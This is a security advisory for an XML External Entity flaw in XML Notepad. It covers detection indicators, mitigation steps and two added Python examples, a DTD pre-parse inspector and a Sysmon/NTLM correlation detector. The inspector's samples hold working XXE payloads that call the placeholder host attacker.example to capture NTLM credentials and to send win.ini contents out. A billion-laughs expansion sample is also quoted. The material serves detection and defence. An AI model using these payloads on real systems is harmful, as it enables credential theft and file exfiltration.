CVE-2026-34401 Overview
CVE-2026-34401 is an XML External Entity (XXE) vulnerability in Microsoft XML Notepad, a Windows application with a simple, intuitive user interface for browsing and editing XML documents. Before version 2.9.0.21, XML Notepad left DTD processing enabled by default, so external entities declared in a document's DTD were resolved automatically when the file was opened. A crafted document can therefore make XML Notepad issue outbound HTTP or SMB requests on the user's behalf, which can leak local file contents or expose the victim's NTLM credentials to an attacker-controlled server.
Critical Impact
An attacker who gets a victim to open a crafted XML file can read files the victim can read and send their contents to a server the attacker controls, or force an SMB connection to the attacker's host and capture the victim's NTLM authentication. Nothing beyond opening the file is required.
Affected Products
- Microsoft XML Notepad versions prior to 2.9.0.21
Discovery Timeline
- 2026-03-31 - CVE-2026-34401 published to NVD
- 2026-04-01 - Last updated in NVD database
Technical Details for CVE-2026-34401
Vulnerability Analysis
This vulnerability is classified as CWE-611: Improper Restriction of XML External Entity Reference. The core issue is XML Notepad's default configuration, which permits DTD processing and external entity resolution. When a user opens a crafted XML document, the parser processes the DTD the document declares, including entity declarations whose SYSTEM identifiers point at resources the attacker controls, and fetches them in the user's security context.
The attack can be weaponized in two primary ways: local file disclosure through file:// (or plain path) SYSTEM identifiers, and NTLM credential theft through forced SMB connections to an attacker-controlled host. The vector is network-delivered but needs user interaction: the victim has to open the file. Once it is open, exploitation proceeds automatically, with no prompt and no further consent.
Root Cause
The root cause is the insecure default configuration of XML Notepad's XML parser: DTD processing is enabled and external entity resolution is unrestricted, so a document can declare entities that read local file system paths or open network connections, all in the security context of the user who opened the file. The application did not ship security-conscious defaults that disable DTD processing or restrict external entity resolution to trusted sources. In the .NET System.Xml stack that XML Notepad is built on, these are two separate knobs on XmlReaderSettings: DtdProcessing (Parse, Ignore or Prohibit) decides whether the DTD is processed at all, and the XmlResolver assigned to the reader decides whether any SYSTEM identifier is ever fetched (a null resolver fetches nothing). A safe default sets both, because DTD parsing combined with a permissive resolver is exactly the condition described here.
Attack Vector
The attacker has to get a malicious XML file in front of the victim: a phishing attachment, a download, or a file planted on a share the victim already uses. When the victim opens it in XML Notepad, the DOCTYPE declaration triggers DTD processing without any prompt. The DTD can declare entities whose SYSTEM identifiers point at URLs, UNC paths or local files, and the DOCTYPE can also pull the whole DTD from a remote location through an external subset, which keeps the visible payload tiny.
For NTLM credential theft, the DTD declares an entity whose SYSTEM identifier is a UNC path (\\host\share\x.dtd) or a file://host/share/... URL on an attacker-controlled host. The SMB client on the victim's machine connects and authenticates transparently, so the attacker receives the NTLM challenge-response (Net-NTLMv2 on a modern client, not the password hash itself), which can be cracked offline if the password is weak or relayed to another service that accepts NTLM. For file disclosure, an entity with a file:// (or plain path) SYSTEM identifier reads a file the victim can read; the contents then reach the attacker through an error message or, more reliably, out of band: a parameter entity fetched from the attacker's server declares a further entity whose URL embeds the file text, and the parser requests that URL. Out-of-band transport has limits worth knowing when assessing exposure: the content must survive being spliced into a URL and a DTD, so short single-line text (INI files, tokens, configuration values) leaks cleanly while binary and multi-line files generally do not. The sample below, taken from the XML Notepad repository, shows a related DTD hazard rather than an external entity: exponential entity expansion ("billion laughs"), one more reason DTD processing is something to enable only for trusted input.
<!DOCTYPE root [
<!-- This XML Document demonstrates a DTD entity explosion risk. Please make sure you
know and trust the DTDs you process before you enable DTD processing in XML Notepad. -->
<!ELEMENT root (#PCDATA)>
<!ENTITY e0 "This is some long text that we will replicate exponentially">
<!ENTITY e1 "&e0;&e0;&e0;&e0;&e0;&e0;&e0;&e0;&e0;&e0;">
<!ENTITY e2 "&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;">
<!ENTITY e3 "&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;">
<!ENTITY e4 "&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;&e3;">
]>
<root>&e4;</root>
Source: GitHub Commit c03ab23
Detection Methods for CVE-2026-34401
Indicators of Compromise
- Unexpected outbound SMB connections (TCP 445, also 139) from XmlNotepad.exe to addresses outside the organisation, timed with an XML file being opened
- HTTP requests from the XmlNotepad.exe process to unfamiliar external domains, in particular for .dtd resources or with long query strings that carry file-like content
- XML files whose DOCTYPE declares SYSTEM entities using file://, http:// or UNC (\\host\share) identifiers, or loads an external DTD from a remote URL; a DOCTYPE is rare in hand-written XML and is itself a signal
- Outgoing NTLM authentication from a workstation to a host that is not a domain member or a known file server
Detection Strategies
- Monitor network connections from XmlNotepad.exe (Sysmon Event ID 3 or equivalent EDR telemetry) and alert on any destination outside internal address ranges; a document editor has no business opening SMB or HTTP sessions to the Internet
- Scan XML files at the mail gateway and on file shares for DOCTYPE declarations that reference remote URLs or declare external (SYSTEM/PUBLIC) entities, before a DTD-processing parser ever opens them
- Configure endpoint detection rules to alert on SMB authentication attempts initiated by document-editing processes
- Use network traffic analysis to spot the out-of-band XXE pattern: a fetch of a .dtd resource from a new host followed by a request to the same host whose query string carries file contents
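The payload anatomy described under Attack Vector and the file-scanning strategy above both come down to reading the DTD before anything resolves it. The following is an added example, not XML Notepad code: a Python inspector that, without parsing or fetching anything, classifies SYSTEM identifiers by what Windows would do with them (SMB for UNC and file://host paths, network for http, local file for file:///), finds declarations hidden inside entity values via &#x25;, and estimates entity-expansion amplification. The sample documents, including the attacker-side DTD for the out-of-band case, are constructed for this example and the host names are placeholders.

```python
"""Pre-parse DTD inspection for XML: flags external DTD subsets, external (SYSTEM/PUBLIC)
entities, declarations hidden inside entity values, and entity-expansion amplification, without
fetching or expanding anything. Added example, not XML Notepad code; samples are constructed."""
import html
import re
from typing import NamedTuple
from urllib.parse import urlsplit

EXT = r"""(?:SYSTEM|PUBLIC\s+["'][^"']*["'])\s+["'](?P<uri>[^"']*)["']"""  # SYSTEM "u" | PUBLIC "id" "u"
DOCTYPE_RE = re.compile(r"<!DOCTYPE\s+[\w:.-]+(?:\s+" + EXT + r")?\s*(?:\[(?P<subset>.*?)\])?\s*>", re.S | re.I)
ENTITY_RE = re.compile(r"<!ENTITY\s+(?P<param>%\s+)?(?P<name>[\w:.-]+)\s+(?:" + EXT
                       + r"""|(?P<q>["'])(?P<value>.*?)(?P=q))(?:\s+NDATA\s+[\w:.-]+)?\s*>""", re.S | re.I)
REF_RE = re.compile(r"&([\w:.-]+);")

class Finding(NamedTuple):
    kind: str     # external-dtd | external-entity | nested-external-entity | entity-expansion | malformed-dtd
    detail: str
    channel: str  # smb | network | local-file | relative | other:<scheme> | dos | reject

def classify_uri(uri: str) -> str:
    """What a DTD-processing parser on Windows does with this identifier when it resolves it."""
    u = uri.strip()
    if u.startswith(("\\\\", "//")):
        return "smb"                        # UNC path: the SMB redirector connects, NTLM auth follows
    parts = urlsplit(u)
    if len(parts.scheme) == 1:
        return "local-file"                 # bare drive path such as C:\...
    if parts.scheme in ("http", "https", "ftp"):
        return "network"
    if parts.scheme == "file":
        return "smb" if parts.netloc else "local-file"   # file://host/share is a UNC path in disguise
    return "other:" + parts.scheme if parts.scheme else "relative"

def scan_dtd(dtd: str, internal: dict = None, kind: str = "external-entity") -> list:
    """Findings for DTD text (an internal subset or a standalone DTD); fills `internal` with general entities."""
    internal, findings = ({} if internal is None else internal), []
    for e in ENTITY_RE.finditer(dtd):
        label = ("%" if e.group("param") else "") + e.group("name")
        if e.group("uri") is not None:
            findings.append(Finding(kind, f"{label} -> {e.group('uri')}", classify_uri(e.group("uri"))))
            continue
        if not e.group("param"):
            internal[e.group("name")] = e.group("value")
        # "&#x25;" smuggles a "%" into a value so a further declaration appears only on expansion: look inside.
        inner = html.unescape(e.group("value"))
        if "<!ENTITY" in inner.upper():
            findings += scan_dtd(inner, internal, "nested-external-entity")
    return findings

def _expanded_len(name: str, internal: dict, memo: dict) -> int:
    """Length of the fully expanded replacement text of general entity `name` (memoised)."""
    if name not in internal:
        return 0                            # undeclared, predefined or external: nothing expands locally
    if name in memo:
        if memo[name] is None:
            raise ValueError(f"entity {name!r} references itself")   # illegal XML; parsers reject it
        return memo[name]
    memo[name] = None                       # marks "in progress" so a cycle is caught above
    value, total, pos = internal[name], 0, 0
    for m in REF_RE.finditer(value):
        total += (m.start() - pos) + _expanded_len(m.group(1), internal, memo)
        pos = m.end()
    memo[name] = total + len(value) - pos
    return memo[name]

def inspect_xml(text: str, max_expansion: int = 1_000_000, max_ratio: float = 100.0) -> dict:
    """Inspect a whole document. Nothing is fetched and no real XML parser is involved."""
    report = {"has_doctype": False, "expanded_bytes": 0, "findings": []}
    m = DOCTYPE_RE.search(text)
    if not m:
        return report                       # no DOCTYPE: DTD processing has nothing to act on
    report["has_doctype"] = True
    if m.group("uri") is not None:
        report["findings"].append(Finding("external-dtd", m.group("uri"), classify_uri(m.group("uri"))))
    internal, memo, total = {}, {}, 0
    report["findings"] += scan_dtd(m.group("subset") or "", internal)
    try:
        for r in REF_RE.finditer(text[m.end():]):
            total += _expanded_len(r.group(1), internal, memo)
    except ValueError as exc:
        report["findings"].append(Finding("malformed-dtd", str(exc), "reject"))
    report["expanded_bytes"] = total
    if total > max_expansion or total > max_ratio * len(text):
        report["findings"].append(Finding("entity-expansion", f"{total} bytes from a {len(text)}-byte file", "dos"))
    return report

# Constructed samples with placeholder hosts. 1: UNC SYSTEM identifier -> SMB connection and NTLM auth.
SAMPLE_NTLM = r"""<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY xxe SYSTEM "\\attacker.example\share\lure.dtd"> ]>
<note>&xxe;</note>"""
# 2: out-of-band exfiltration. The document fetches a parameter entity from the attacker; the DTD
# served there reads a local file and splices it into a URL that the parser then requests.
SAMPLE_OOB = """<!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd"> %remote; ]>
<data>placeholder</data>"""
ATTACKER_DTD = """<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'http://attacker.example/?d=%file;'>">
%wrap; %send;"""
# 3: the repository's entity-explosion sample regenerated: 59-byte seed, tenfold at each of 4 levels.
SAMPLE_EXPANSION = ('<!DOCTYPE root [<!ELEMENT root (#PCDATA)>'
                    '<!ENTITY e0 "This is some long text that we will replicate exponentially">'
                    + "".join('<!ENTITY e%d "%s">' % (i, "&e%d;" % (i - 1) * 10) for i in range(1, 5))
                    + ']><root>&e4;</root>')
```

Run inspect_xml over attachments at the mail gateway or over a share; anything with a non-empty findings list goes to quarantine or review. Two points of policy to decide up front: documents with PUBLIC identifiers (XHTML, DocBook) are reported as network fetches because that is what a resolving parser would do, and the expansion estimate only covers general entities declared in the internal subset, so an external DTD that itself contains the explosion is reported as the external fetch rather than as a size.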
Monitoring Recommendations
- Deploy an EDR/XDR platform such as SentinelOne Singularity to detect anomalous process behaviour when XML Notepad initiates network connections
- Configure SIEM alerts for outbound SMB (TCP 445/139) from workstations to non-internal addresses, keyed on the originating process so that XmlNotepad.exe stands out from legitimate file-server traffic
- Set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Audit all and collect the Microsoft-Windows-NTLM/Operational log (Event ID 8001), then correlate outgoing NTLM events with XML Notepad execution; the Security log alone does not show the client side of an outbound NTLM exchange
- Implement DNS logging to identify lookups for domains referenced in DTD files; the lookup fires before the SMB or HTTP connection and is still visible when the connection itself is blocked
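The process-level, SMB and NTLM items above can be expressed as one small detection. What follows is an added example in Python, not XML Notepad code and not any vendor's rule language. The records are constructed: the field names are a normalised form of Sysmon Event ID 3 (NetworkConnect) and of the NTLM/Operational Event ID 8001 (assumed to carry the calling process and PID), the XmlNotepad.exe path, PIDs, user and timestamps are invented, and 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in for the Internet.

```python
"""Network-side detection for XXE from a document viewer: flag watched processes that open SMB or
web connections to non-internal addresses, then tie an outgoing NTLM authentication back to the
same process. Added example, not XML Notepad code; all events below are constructed."""
import ipaddress
from datetime import datetime, timedelta

# Assumed watch list: processes that should never, on their own, talk SMB or HTTP to the Internet.
WATCHED_IMAGES = {"xmlnotepad.exe"}
# What an XXE payload reaches for: SMB for UNC / file://host entities, HTTP(S) for remote DTDs and
# out-of-band exfiltration.
SMB_PORTS = {445, 139}
WEB_PORTS = {80, 443, 8080}
# Assumed definition of "internal": RFC 1918 plus loopback and link-local. Deliberately not
# ipaddress.is_private, which also treats the documentation ranges used below as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def image_name(path: str) -> str:
    """Case-insensitive basename of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def flag_connections(events: list) -> list:
    """Sysmon Event ID 3 records -> alerts for watched processes reaching external hosts.
    Opening an XML file from an internal file server is normal and is not flagged."""
    alerts = []
    for ev in events:
        if ev.get("event_id") != 3 or image_name(ev["image"]) not in WATCHED_IMAGES:
            continue
        if is_internal(ev["dest_ip"]):
            continue
        if ev["dest_port"] in SMB_PORTS:
            rule = "doc-viewer-external-smb"
        elif ev["dest_port"] in WEB_PORTS:
            rule = "doc-viewer-external-http"
        else:
            continue
        alerts.append({"rule": rule, "time": ev["time"], "pid": ev["pid"],
                       "image": image_name(ev["image"]),
                       "dest": f"{ev['dest_ip']}:{ev['dest_port']}"})
    return alerts

def correlate_ntlm(alerts: list, ntlm_events: list, window: timedelta = timedelta(seconds=10)) -> list:
    """Pair each external-SMB alert with an outgoing NTLM authentication (Event ID 8001, produced when
    'Outgoing NTLM traffic to remote servers' is set to Audit all) from the same PID inside `window`.
    That pairing is the credential-capture case, not merely a failed fetch."""
    hits = []
    for n in ntlm_events:
        if n.get("event_id") != 8001 or image_name(n["process_name"]) not in WATCHED_IMAGES:
            continue
        for a in alerts:
            if (a["rule"] == "doc-viewer-external-smb" and a["pid"] == n["pid"]
                    and abs(a["time"] - n["time"]) <= window):
                hits.append({"rule": "xxe-ntlm-capture", "user": n["user"],
                             "target": n["target_server"], "dest": a["dest"], "pid": a["pid"]})
    return hits

# Constructed telemetry. Path, PIDs, user and times are invented.
T0 = datetime(2026, 4, 2, 9, 15, 0)
XMLNOTEPAD = r"C:\Tools\XmlNotepad\XmlNotepad.exe"
SYSMON_EVENTS = [
    # benign: the user opens a document from an internal file server
    {"event_id": 3, "time": T0, "pid": 4242, "image": XMLNOTEPAD, "dest_ip": "10.20.0.5", "dest_port": 445},
    # benign: browser traffic is not on the watch list
    {"event_id": 3, "time": T0, "pid": 1111, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "198.51.100.7", "dest_port": 443},
    # the XXE: a UNC SYSTEM identifier makes the SMB redirector connect to the attacker
    {"event_id": 3, "time": T0 + timedelta(seconds=3), "pid": 4242, "image": XMLNOTEPAD,
     "dest_ip": "203.0.113.10", "dest_port": 445},
    # remote DTD fetch / out-of-band exfiltration channel
    {"event_id": 3, "time": T0 + timedelta(seconds=4), "pid": 4242, "image": XMLNOTEPAD,
     "dest_ip": "203.0.113.10", "dest_port": 80},
]
NTLM_EVENTS = [
    {"event_id": 8001, "time": T0 + timedelta(seconds=3), "pid": 4242, "process_name": XMLNOTEPAD,
     "user": r"ACME\alice", "target_server": "attacker.example"},
]

if __name__ == "__main__":
    found = flag_connections(SYSMON_EVENTS)
    for alert in found + correlate_ntlm(found, NTLM_EVENTS):
        print(alert)
```

The correlation step is what turns a noisy "process made a connection" event into an incident: an external SMB connection with a matching outgoing NTLM audit event means credentials left the host, and the user field tells you whose password to rotate. If outbound 445 is blocked at the perimeter, the NTLM event never appears and the connection alert alone is the indicator that a malicious document was opened.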
How to Mitigate CVE-2026-34401
Immediate Actions Required
- Update Microsoft XML Notepad to version 2.9.0.21 or later immediately
- Educate users about the risks of opening untrusted XML files from unknown sources
- Review and quarantine any recently opened XML files from untrusted sources
- Block outbound SMB (TCP 445 and 139) at the network perimeter; workstations have essentially no legitimate reason to speak SMB to Internet hosts, and the block closes the credential-capture path even on machines that are not yet patched
Patch Information
Microsoft has addressed this vulnerability in XML Notepad version 2.9.0.21. The patch modifies the default DTD processing behavior and adds user prompts when DTD settings are changed. Users should update to this version or later through the official GitHub release. For detailed technical information, refer to the GitHub Security Advisory GHSA-5j32-486h-42ch.
Workarounds
- Disable DTD processing in XML Notepad settings if the option is available in your version
- Use alternative XML editors that disable external entity resolution by default
- Implement network segmentation to prevent workstations from making direct outbound SMB connections
- Configure Windows Defender Firewall with a per-program outbound block rule for XmlNotepad.exe; this also stops legitimate fetches of remote schemas and DTDs, which is usually an acceptable trade
Version bump in the project file from commit 3665603:
<ApplicationRevision>20</ApplicationRevision>
<ApplicationVersion>2.9.0.20</ApplicationVersion>
Source: GitHub Commit 3665603
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

